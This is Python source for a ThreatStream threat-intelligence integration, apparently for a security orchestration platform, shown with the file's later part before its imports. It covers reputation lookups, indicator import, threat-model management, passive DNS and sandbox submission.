args_to_keys_map.items()} dbot_score = Common.DBotScore( ip, DBotScoreType.IP, THREAT_STREAM, score=score_calc.calculate_score(DBotScoreType.IP, indicator, threshold), reliability=client.reliability, ) ip_indicator = Common.IP( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.IP', outputs_key_field='Address', indicator=ip_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def domains_reputation_command(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Wrapper function for get_domain_reputation. """ results = [] # type: ignore domains = argToList(domain, ',') for single_domain in domains: results.append(get_domain_reputation(client, score_calc, single_domain, status, threshold)) return results def get_domain_reputation(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Checks the reputation of given domain from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=domain, type=DBotScoreType.DOMAIN, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=domain) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Domain reputation for: {domain}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Domain, RELATIONSHIPS_MAPPING.get('domain'), ) # create the Domain instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('domain') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} geo_location = f"{indicator.get("latitude")},{indicator.get("longitude")}" if indicator.get('latitude') else None dbot_score = Common.DBotScore( domain, DBotScoreType.DOMAIN, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.DOMAIN, indicator, threshold), ) domain_indicator = Common.Domain( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], geo_location=geo_location, relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Domain', outputs_key_field='Address', indicator=domain_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def files_reputation_command(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Wrapper function for get_file_reputation. """ results = [] files = argToList(file, ',') for single_file in files: results.append(get_file_reputation(client, score_calc, single_file, status, threshold)) return results def get_file_reputation(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Checks the reputation of given hash of the file from ThreatStream and returns the indicator with highest severity score. """ # get the indicator params = dict(value=file, type="md5", status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=file) # save the hash value under the hash type key threat_context = get_generic_threat_context(indicator, indicator_mapping=FILE_INDICATOR_MAPPING) file_type: str = indicator.get('subtype') # The real type of the hash is in subtype field. if file_type: threat_context[file_type] = indicator.get('value') # Convert the tags objects into s string for the human readable. tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'File reputation for: {file}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.File, RELATIONSHIPS_MAPPING.get('file'), ) # create the File instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('file') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} if file_type: kwargs[file_type.lower()] = threat_context[file_type] dbot_score = Common.DBotScore( file, DBotScoreType.FILE, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.FILE, indicator, threshold), ) file_indicator = Common.File( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{Common.File.CONTEXT_PATH}', indicator=file_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def urls_reputation_command(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Wrapper function for get_url_reputation. """ results = [] urls = argToList(url, ',') for single_url in urls: results.append(get_url_reputation(client, score_calc, single_url, status, threshold)) return results def get_url_reputation(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Checks the reputation of given url address from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=url, type=DBotScoreType.URL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=url) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'URL reputation for: {url}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.URL, RELATIONSHIPS_MAPPING.get('url'), ) # create the URL instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('url') # type: ignore kwargs = {arg: demisto.get(indicator, key_in_indicator) for (arg, key_in_indicator) in args_to_keys_map.items()} dbot_score = Common.DBotScore( url, DBotScoreType.URL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.URL, indicator, threshold), ) url_indicator = Common.URL( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.URL', outputs_key_field='Address', indicator=url_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_email_reputation(client: Client, score_calc: DBotScoreCalculator, email, status, threshold=None): """ Checks the reputation of given email address from ThreatStream and returns the indicator with highest confidence score. """ params = dict(value=email, type=DBotScoreType.EMAIL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=email) threat_context = get_generic_threat_context(indicator) threat_context['Email'] = threat_context.pop('Address') threat_context.pop('ASN', None) threat_context.pop('Organization', None) threat_context.pop('Country', None) # Convert the tags objects into s string for the human readable. tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Email reputation for: {email}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Email, RELATIONSHIPS_MAPPING.get('email'), ) dbot_score = Common.DBotScore( email, DBotScoreType.EMAIL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.EMAIL, indicator, threshold), ) # create the EMAIL instance email_indicator = Common.EMAIL( dbot_score=dbot_score, address=threat_context['Email'], relationships=relationships, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.EmailReputation', outputs_key_field='Email', indicator=email_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_passive_dns(client: Client, value, type=DBotScoreType.IP, limit=50): """ Receives value and type of indicator and returns enrichment data for domain or ip. """ dns_results = client.http_request("GET", F"v1/pdns/{type}/{value}/").get('results', None) if not dns_results: return f'No Passive DNS enrichment data found for {value}' dns_results = dns_results[:int(limit)] output = camelize(dns_results, delim='_') human_readable = tableToMarkdown(f'Passive DNS enrichment data for: {value}', output) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.PassiveDNS', readable_output=human_readable, outputs=output, raw_response=dns_results, ) def import_ioc_with_approval(client: Client, import_type, import_value, confidence="50", classification="Private", threat_type="exploit", severity="low", ip_mapping=None, domain_mapping=None, url_mapping=None, email_mapping=None, md5_mapping=None): """ Imports indicators data to ThreatStream. The data can be imported using one of three import_types: data-text (plain-text), file-id of uploaded file to war room or URL. """ # prepare data = assign_params( classification=classification, confidence=int(confidence), ip_mapping=ip_mapping, domain_mapping=domain_mapping, url_mapping=url_mapping, email_mapping=email_mapping, md5_mapping=md5_mapping, threat_type=threat_type, severity=severity, ) files = None uploaded_file = None if import_type == 'file-id': try: # import_value should be entry id of uploaded file in war room file_info = demisto.getFilePath(import_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {import_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') files = {'file': (file_info['name'], uploaded_file)} else: data[import_type] = import_value # request res = client.http_request("POST", "v1/intelligence/import/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() # checking that response contains success key if res.get('success', False): imported_id = res.get('import_session_id', '') readable_output = f'The data was imported successfully. The ID of imported job is: {imported_id}' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Import.ImportID', outputs_key_field='ImportID', outputs=imported_id, readable_output=readable_output, raw_response=res, ) else: raise DemistoException('The data was not imported. Check if valid arguments were passed') def import_ioc_without_approval(client: Client, file_id, classification, confidence=None, allow_unresolved='no', source_confidence_weight=None, expiration_ts=None, severity=None, tags=None, trustedcircles=None): """ Imports indicators data to ThreatStream. file_id of uploaded file to war room. """ if tags: tags = argToList(tags) if trustedcircles: trustedcircles = argToList(trustedcircles) try: # entry id of uploaded file to war room file_info = demisto.getFilePath(file_id) with open(file_info['path'], 'rb') as uploaded_file: ioc_to_import = json.load(uploaded_file) except json.JSONDecodeError: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a valid json file.') except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a file.') ioc_to_import.update({'meta': assign_params( classification=classification, confidence=confidence, allow_unresolved=argToBoolean(allow_unresolved), source_confidence_weight=source_confidence_weight, expiration_ts=expiration_ts, severity=severity, tags=tags, trustedcircles=trustedcircles )}) client.http_request("PATCH", "v1/intelligence/", json=ioc_to_import, resp_type='text') return "The data was imported successfully." def get_model_list(client: Client, model, limit="50"): """ Returns list of Threat Model that was specified. By default limit is set to 50 results. Possible values for model are : actor, campaign, incident, signature, ttp, vulnerability, tipreport """ # if limit=0 don't put to context params = dict(limit=limit, skip_intelligence="true", skip_associations="true") model_list = client.http_request("GET", F"v1/{model}/", params=params).get('objects', None) if not model_list: return f'No Threat Model {model.title()} found.' model_type = model.title() models_context = [ { 'Name': threat_model.get('name'), 'ID': threat_model.get('id'), 'CreatedTime': threat_model.get('created_ts'), 'Type': model_type } for threat_model in model_list ] # in case that no limit was passed, the stage of set to context is skipped readable_output = tableToMarkdown(f"List of {model.title()}s", models_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.List', outputs_key_field='ID', outputs=models_context if limit != '0' else None, readable_output=readable_output, raw_response=model_list ) def get_model_description(client: Client, model, id): """ Returns a description of Threat Model as html file to the war room. """ params = dict(skip_intelligence="true", skip_associations="true") response = client.http_request("GET", F"v1/{model}/{id}", params=params, resp_type='response') if response.status_code == 404: return f'No description found for Threat Model {model.title()} with id {id}' description = response.json() if model == 'signature': description = description.get('notes', '') elif model == 'tipreport': description = description.get('body', '') else: description = description.get('description', None) return fileResult(F"{model}_{id}.html", description.encode(encoding='UTF-8')) def get_iocs_by_model(client: Client, model, id, limit="20"): """ Returns list of indicators associated with specific Threat Model by model id. """ params = dict(limit=limit) model_type = model.title() response = client.http_request("GET", F"v1/{model}/{id}/intelligence/", params=params, resp_type='response') if response.status_code == 404: return f'No indicators found for Threat Model {model_type} with id {id}' iocs_list = response.json().get('objects', None) model_type = model.title() iocs_context = parse_indicators_list(iocs_list) outputs = { 'ModelType': model_type, 'ModelID': id, 'Indicators': iocs_context } readable_output = tableToMarkdown(f'Indicators list for Threat Model {model_type} with id {id}', iocs_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Model', outputs_key_field=['ModelID', 'ModelType'], outputs=outputs, readable_output=readable_output, raw_response=iocs_list ) def create_model(client: Client, model, name, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Creates Threat Model with basic parameters. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) model_id = client.http_request("POST", F"v1/{model}/", data=json.dumps(data)).get('id', None) if model_id: return get_iocs_by_model(client, model, model_id, limit="50") else: raise DemistoException(f'{model.title()} Threat Model was not created. Check the input parameters') def update_model(client: Client, model, model_id, name=None, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Updates a ThreatStream model with parameters. In case one or more optional parameters are defined, the previous data is overridden. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) client.http_request("PATCH", F"v1/{model}/{model_id}/", data=json.dumps(data)) return get_iocs_by_model(client, model, model_id, limit="50") def get_supported_platforms(client: Client, sandbox_type="default"): """ Returns list of supported platforms for premium sandbox or default sandbox. """ platform_data = client.http_request("GET", "v1/submit/parameters/") result_key = 'platform_choices' if sandbox_type == 'default' else 'premium_platform_choices' available_platforms = platform_data.get(result_key, []) if not available_platforms: return f'No supported platforms found for {sandbox_type} sandbox' output = camelize(available_platforms) outputs_prefix = 'DefaultPlatforms' if sandbox_type == 'default' else 'PremiumPlatforms' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{outputs_prefix}', outputs=output, readable_output=tableToMarkdown(f'Supported platforms for {sandbox_type} sandbox', output), raw_response=platform_data ) def get_submission_status(client: Client, report_id, output_as_command_result=True): """ Returns the sandbox submission status. If status is not received in report_info then status is set to done. Receives boolean flag that indicates if result should be as command result. By default the output boolean is set to True. """ response = client.http_request("GET", F"v1/submit/{report_id}/", resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report_info = response.json() status = report_info.get('status', "done") verdict = report_info.get('verdict', '').title() platform = report_info.get('platform', '') if output_as_command_result: report_outputs = {'ReportID': report_id, 'Status': status, 'Platform': platform, 'Verdict': verdict} readable_output = tableToMarkdown(f'The analysis status for id {report_id}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: return status, verdict def file_name_to_valid_string(file_name): """ Demoji the file name if it's contain emoji """ if emoji.emoji_count(file_name): # type: ignore return emoji.demojize(file_name) # type: ignore return file_name def submit_report(client: Client, submission_type, submission_value, submission_classification="private", report_platform="WINDOWS7", premium_sandbox="false", detail=None): """ Detonates URL or file that was uploaded to war room to ThreatStream sandbox. """ data = { 'report_radio-classification': submission_classification, 'report_radio-platform': report_platform, 'use_premium_sandbox': premium_sandbox, } if detail: data['detail'] = detail uploaded_file = None files = None if submission_type == 'file': # submission_value should be entry id of uploaded file in war room try: file_info = demisto.getFilePath(submission_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {submission_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') file_name = file_name_to_valid_string(file_info.get('name')) files = {'report_radio-file': (file_name, uploaded_file)} else: data['report_radio-url'] = submission_value submit_res = client.http_request("POST", "v1/submit/new/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() if argToBoolean(submit_res.get('success', 'false')): report_info = submit_res['reports'][report_platform] report_id = report_info['id'] report_status, _ = get_submission_status(client, report_id, False) report_outputs = {'ReportID': report_id, 'Status': report_status, 'Platform': report_platform} readable_output = tableToMarkdown(f'The submission info for {submission_value}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: raise DemistoException(f'The submission of {submission_value} failed') def get_report(client: Client, report_id): """ Returns the report from ThreatStream sandbox by id. """ response = client.http_request('GET', f'v1/submit/{report_id}/report', resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report = response.json() report_results = report.get('results', {}) if report_results: info = parse_info(report_results.get('info', {})) info['ReportID'] = report_id _, info['Verdict'] = get_submission_status(client, report_id, False) readable_output = tableToMarkdown(f'Report {report_id} analysis results', info) # ignore 'networks' from the readable output info['Network'] = parse_network_lists(report_results.get('network', {})) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=info, readable_output=readable_output, raw_response=report ) def add_tag_to_model(client: Client, model_id, tags, model="intelligence"): """ Adds tag to specific Threat Model. By default is set to intelligence (indicators). """ tags = argToList(tags) data = { 'tags': [{'name': t, 'tlp': 'red'} for t in tags] } res = client.http_request("POST", F"v1/{model}/{model_id}/tag/", data=json.dumps(data)) if argToBoolean(res.get('success', 'false')): return f'Added successfully tags: {tags} to {model} with {model_id}' else: raise DemistoException(f'Failed to add {tags} to {model} with {model_id}') def get_indicators(client: Client, **kwargs): """ Returns filtered indicators by parameters from ThreatStream. By default the limit of indicators result is set to 20. """ limit = kwargs['limit'] = int(kwargs.get('limit', 20)) offset = kwargs['offset'] = 0 url = "v2/intelligence/" if 'query' in kwargs: url += f"?{kwargs.pop("query")}" iocs_list = client.http_request("GET", url, params=kwargs).get('objects', None) if not iocs_list: return 'No indicators found from ThreatStream' iocs_context = parse_indicators_list(iocs_list) # handle the issue that the API does not return more than 1000 indicators. if limit > 1000: while len(iocs_context) < limit: offset += len(iocs_list) kwargs['limit'] = limit kwargs['offset'] = offset iocs_list = client.http_request("GET", "v2/intelligence/", params=kwargs).get('objects', None) if iocs_list: iocs_context.extend(parse_indicators_list(iocs_list)) else: break return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Indicators', outputs=iocs_context, readable_output=tableToMarkdown("The indicators results", iocs_context), raw_response=iocs_list ) def main(): """ Initiate integration command """ command = demisto.command() LOG(f'Command being called is {command}') params = demisto.params() # init credentials user_name = params.get('credentials', {}).get('identifier') api_key = params.get('credentials', {}).get('password') server_url = params.get('url', '').strip('/') reliability = params.get('integrationReliability', DBotScoreReliability.B) if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("Please provide a valid value for the Source Reliability parameter.") commands = { # reputation commands 'ip': ips_reputation_command, 'domain': domains_reputation_command, 'file': files_reputation_command, 'url': urls_reputation_command, 'threatstream-email-reputation': get_email_reputation, 'threatstream-import-indicator-with-approval': import_ioc_with_approval, 'threatstream-import-indicator-without-approval': import_ioc_without_approval, 'threatstream-get-analysis-status': get_submission_status, 'threatstream-get-passive-dns': get_passive_dns, 'threatstream-get-model-list': get_model_list, 'threatstream-get-model-description': get_model_description, 'threatstream-get-indicators-by-model': get_iocs_by_model, 'threatstream-get-indicators': get_indicators, 'threatstream-supported-platforms': get_supported_platforms, 'threatstream-analysis-report': get_report, 'threatstream-create-model': create_model, 'threatstream-update-model': update_model, 'threatstream-submit-to-sandbox': submit_report, 'threatstream-add-tag-to-model': add_tag_to_model, } try: client = Client( base_url=f'{server_url}/api/', user_name=user_name, api_key=api_key, verify=not params.get('insecure', False), proxy=params.get('proxy', False), reliability=reliability, should_create_relationships=params.get('create_relationships', True), ) args = prepare_args(demisto.args(), command, params) if command == 'test-module': result = test_module(client) elif command in REPUTATION_COMMANDS: result = commands[command](client, DBotScoreCalculator(params), **args) # type: ignore else: result = commands[command](client, **args) # type: ignore return_results(result) except Exception as err: return_error(f'{str(err)}, traceback {traceback.format_exc()}') # python2 uses __builtin__ python3 uses builtins if __name__ in ("builtins", "__builtin__", "__main__"): main()
import emoji import demistomock as demisto from CommonServerPython import * import traceback REPUTATION_COMMANDS = ['ip', 'domain', 'file', 'url', 'threatstream-email-reputation'] # Disable insecure warnings requests.packages.urllib3.disable_warnings() ''' GLOBALS/PARAMS ''' THREAT_STREAM = 'ThreatStream' NO_INDICATORS_FOUND_MSG = 'No intelligence has been found for {searchable_value}' DEFAULT_MALICIOUS_THRESHOLD = 65 DEFAULT_SUSPICIOUS_THRESHOLD = 25 HEADERS = { 'Content-Type': 'application/json' } IOC_ARGS_TO_INDICATOR_KEY_MAP = { 'domain': { 'domain': 'value', 'dns': 'ip', 'organization': 'org', 'traffic_light_protocol': 'tlp', 'geo_country': 'country', 'creation_date': 'created_ts', 'updated_date': 'modified_ts', 'registrant_name': 'meta.registrant_name', 'registrant_email': 'meta.registrant_email', 'registrant_phone': 'meta.registrant_phone' }, 'url': { 'url': 'value', 'asn': 'asn', 'organization': 'org', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'ip': { 'ip': 'value', 'asn': 'asn', 'geo_latitude': 'latitude', 'geo_longitude': 'longitude', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'file': { 'organization': 'org', 'traffic_light_protocol': 'tlp' } } DEFAULT_INDICATOR_MAPPING = { 'asn': 'ASN', 'value': 'Address', 'country': 'Country', 'type': 'Type', 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'org': 'Organization', 'source': 'Source', 'tags': 'Tags', } FILE_INDICATOR_MAPPING = { 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'source': 'Source', 'subtype': 'Type', 'tags': 'Tags' } INDICATOR_EXTENDED_MAPPING = { 'Value': 'value', 'ID': 'id', 'IType': 'itype', 'Confidence': 'confidence', 'Country': 'country', 'Organization': 'org', 'ASN': 'asn', 'Status': 'status', 'Tags': 'tags', 'Modified': 'modified_ts', 'Source': 'source', 'Type': 'type', 'Severity': 'severity' } RELATIONSHIPS_MAPPING = { 'ip': [ { 'name': EntityRelationship.Relationships.RESOLVES_TO, 'raw_field': 'rdns', 'entity_b_type': FeedIndicatorType.Domain }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'domain': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'url': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'file': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'email': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ] } ''' HELPER FUNCTIONS ''' class Client(BaseClient): def __init__(self, base_url, user_name, api_key, verify, proxy, reliability, should_create_relationships): super().__init__(base_url=base_url, verify=verify, proxy=proxy, ok_codes=(200, 201, 202)) self.reliability = reliability self.should_create_relationships = should_create_relationships self.credentials = { 'username': user_name, 'api_key': api_key } def http_request(self, method, url_suffix, params=None, data=None, headers=None, files=None, json=None, resp_type='json'): """ A wrapper for requests lib to send our requests and handle requests and responses better. """ params = params or {} params.update(self.credentials) res = super()._http_request( method=method, url_suffix=url_suffix, headers=headers, params=params, data=data, json_data=json, files=files, resp_type=resp_type, error_handler=self.error_handler, ) return res def error_handler(self, res: requests.Response): """ Error handler to call by super().http_request in case an error was occurred """ # Handle error responses gracefully if res.status_code == 401: raise DemistoException(f"{THREAT_STREAM} - Got unauthorized from the server. Check the credentials.") elif res.status_code in {404}: command = demisto.command() if command in ['threatstream-get-model-description', 'threatstream-get-indicators-by-model', 'threatstream-get-analysis-status', 'threatstream-analysis-report']: # in order to prevent raising en error in case model/indicator/report was not found return else: raise DemistoException(f"{THREAT_STREAM} - The resource was not found.") raise DemistoException(F"{THREAT_STREAM} - Error in API call {res.status_code} - {res.text}") class DBotScoreCalculator: """ Class for DBot score calculation based on thresholds and confidence """ def __init__(self, params: Dict): self.instance_defined_thresholds = { DBotScoreType.IP: arg_to_number(params.get('ip_threshold')), DBotScoreType.URL: arg_to_number(params.get('url_threshold')), DBotScoreType.FILE: arg_to_number(params.get('file_threshold')), DBotScoreType.DOMAIN: arg_to_number(params.get('domain_threshold')), DBotScoreType.EMAIL: arg_to_number(params.get('email_threshold')), } def calculate_score(self, ioc_type: str, indicator, threshold=None): """ Calculate the DBot score according the indicator's confidence and thresholds if exist """ # in case threshold was defined in the instance or passed as argument # we have only two scores levels - malicious or good # if threshold wasn't defined we have three score levels malicious suspicious and good confidence = indicator.get('confidence', Common.DBotScore.NONE) defined_threshold = threshold or self.instance_defined_thresholds.get(ioc_type) if defined_threshold: return Common.DBotScore.BAD if confidence >= defined_threshold else Common.DBotScore.GOOD else: if confidence > DEFAULT_MALICIOUS_THRESHOLD: return Common.DBotScore.BAD if confidence > DEFAULT_SUSPICIOUS_THRESHOLD: return Common.DBotScore.SUSPICIOUS else: return Common.DBotScore.GOOD def find_worst_indicator(indicators): """ Sorts list of indicators by confidence score and returns one indicator with the highest confidence. In case the indicator has no confidence value, the indicator score is set to 0 (NONE). """ indicators.sort(key=lambda ioc: ioc.get('confidence', Common.DBotScore.NONE), reverse=True) return indicators[0] def prepare_args(args, command, params): # removing empty keys that can be passed from playbook input args = {k: v for (k, v) in args.items() if v} # special handling for ip, domain, file, url and threatstream-email-reputation commands if command in REPUTATION_COMMANDS: default_include_inactive = params.get('include_inactive', False) include_inactive = argToBoolean(args.pop('include_inactive', default_include_inactive)) args['status'] = "active,inactive" if include_inactive else "active" if 'threshold' in args: args['threshold'] = arg_to_number(args['threshold']) # special handling for threatstream-get-indicators if 'indicator_severity' in args: args['meta.severity'] = args.pop('indicator_severity', None) if 'tags_name' in args: args['tags.name'] = args.pop('tags_name', None) if 'indicator_value' in args: args['value'] = args.pop('indicator_value', None) return args def get_tags(indicator): """ Return list of the indicator's tags threat_type and maltype """ tags = [] for key in ['meta.maltype', 'threat_type']: val = demisto.get(indicator, key) if val: tags.append(val) indicator_tags = indicator.get('tags', []) if indicator_tags: tags.extend([str(tag.get('name', '')) for tag in indicator_tags]) return tags def search_worst_indicator_by_params(client: Client, params): """ Generic function that searches for indicators from ThreatStream by given query string. Returns indicator with the highest confidence score. """ indicators_data = client.http_request("Get", "v2/intelligence/", params=params) if not indicators_data['objects']: return None return find_worst_indicator(indicators_data['objects']) def get_generic_threat_context(indicator, indicator_mapping=DEFAULT_INDICATOR_MAPPING): """ Receives indicator and builds new dictionary from values that were defined in DEFAULT_INDICATOR_MAPPING keys and adds the Severity key with indicator severity value. """ context = {indicator_mapping[k]: v for (k, v) in indicator.items() if k in indicator_mapping.keys()} context['Tags'] = get_tags(indicator) context['Severity'] = demisto.get(indicator, 'meta.severity') or 'low' return context def parse_network_elem(element_list, context_prefix): """ Parses the network elements list and returns a new dictionary. """ return list(map(lambda e: { F'{context_prefix}Source': e.get('src', ''), F'{context_prefix}Destination': e.get('dst', ''), F'{context_prefix}Port': e.get('dport', ''), }, element_list)) def parse_network_lists(network): """ Parses the network part that was received from sandbox report json. In each list, only sublist of 10 elements is taken. """ hosts = [{'Hosts': h} for h in network.get('hosts', [])[:10]] if 'packets' in network: network = network['packets'] udp_list = parse_network_elem(network.get('udp', [])[:10], 'Udp') icmp_list = parse_network_elem(network.get('icmp', [])[:10], 'Icmp') tcp_list = parse_network_elem(network.get('tcp', [])[:10], 'Tcp') http_list = parse_network_elem(network.get('http', [])[:10], 'Http') https_list = parse_network_elem(network.get('https', [])[:10], 'Https') network_result = udp_list + icmp_list + tcp_list + http_list + https_list + hosts return network_result def parse_info(info): """ Parses the info part that was received from sandbox report json """ info.update(info.pop('machine', {})) parsed_info = { 'Category': info.get('category', '').title(), 'Started': info.get('started', ''), 'Completed': info.get('ended', ''), 'Duration': info.get('duration', ''), 'VmName': info.get('name', ''), 'VmID': info.get('id', '') } return parsed_info def parse_indicators_list(iocs_list): """ Parses the indicator list and returns dictionary that will be set to context. """ iocs_context = [] for indicator in iocs_list: if indicator.get('type', '') == 'md5': indicator['type'] = indicator.get('subtype', '') indicator['severity'] = demisto.get(indicator, 'meta.severity') or 'low' tags = indicator.get('tags') or [] indicator['tags'] = ",".join(tag.get('name', '') for tag in tags) iocs_context.append({key: indicator.get(ioc_key) for (key, ioc_key) in INDICATOR_EXTENDED_MAPPING.items()}) return iocs_context def build_model_data(model, name, is_public, tlp, tags, intelligence, description): """ Builds data dictionary that is used in Threat Model creation/update request. """ if model == 'tipreport': description_field_name = 'body' else: description_field_name = 'description' data = {k: v for (k, v) in (('name', name), ('is_public', is_public), ('tlp', tlp), (description_field_name, description)) if v} if tags: data['tags'] = tags if isinstance(tags, list) else [t.strip() for t in tags.split(',')] if intelligence: data['intelligence'] = intelligence if isinstance(intelligence, list) else [i.strip() for i in intelligence.split(',')] return data def create_relationships(client: Client, indicator, ioc_type, relation_mapper): relationships: List[EntityRelationship] = [] if not client.should_create_relationships: return relationships for relation in relation_mapper: entity_b = demisto.get(indicator, relation['raw_field']) if entity_b: relationships.append(EntityRelationship(entity_a=indicator['value'], entity_a_type=ioc_type, name=relation['name'], entity_b=entity_b, entity_b_type=relation['entity_b_type'], source_reliability=client.reliability, brand=THREAT_STREAM)) return relationships ''' COMMANDS + REQUESTS FUNCTIONS ''' def test_module(client: Client): """ Performs basic get request to get item samples """ client.http_request('GET', 'v2/intelligence/', params=dict(limit=1)) return 'ok' def ips_reputation_command(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): results = [] # type: ignore ips = argToList(ip, ',') for single_ip in ips: results.append(get_ip_reputation(client, score_calc, single_ip, status, threshold)) return results def get_ip_reputation(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): """ Checks the reputation of given ip from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = { 'value': ip, 'type': DBotScoreType.IP, 'status': status, 'limit': 0, } indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=ip) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'IP reputation for: {ip}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, 